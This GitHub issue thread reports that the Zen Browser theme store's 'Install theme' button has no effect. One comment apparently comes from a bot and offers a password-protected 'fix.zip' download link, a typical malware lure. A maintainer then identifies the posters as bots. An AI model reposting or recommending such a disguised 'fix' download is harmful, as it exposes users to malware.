### ISSUE TITLE
"Install theme" button takes no efffect

### ISSUE THREAD

**Issue by EdwinStep** [zen-browser/theme-store#217]
After clicking "install theme" button becomes disabled and nothing happens. After page refresh button is active again.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EdwinStep** [comment]
@mauro-balades is this file safe and approved that @PiaoR is sharing?

**Comment by mauro-balades** [comment]
No, they are bots. The theme store is temporarily down

**Comment by EdwinStep** [comment]
@mauro-balades I thought so. Thanks for clarifying

**Comment by fervflow** [comment]
Why was this closed though? At least for me the theme store is still not working.
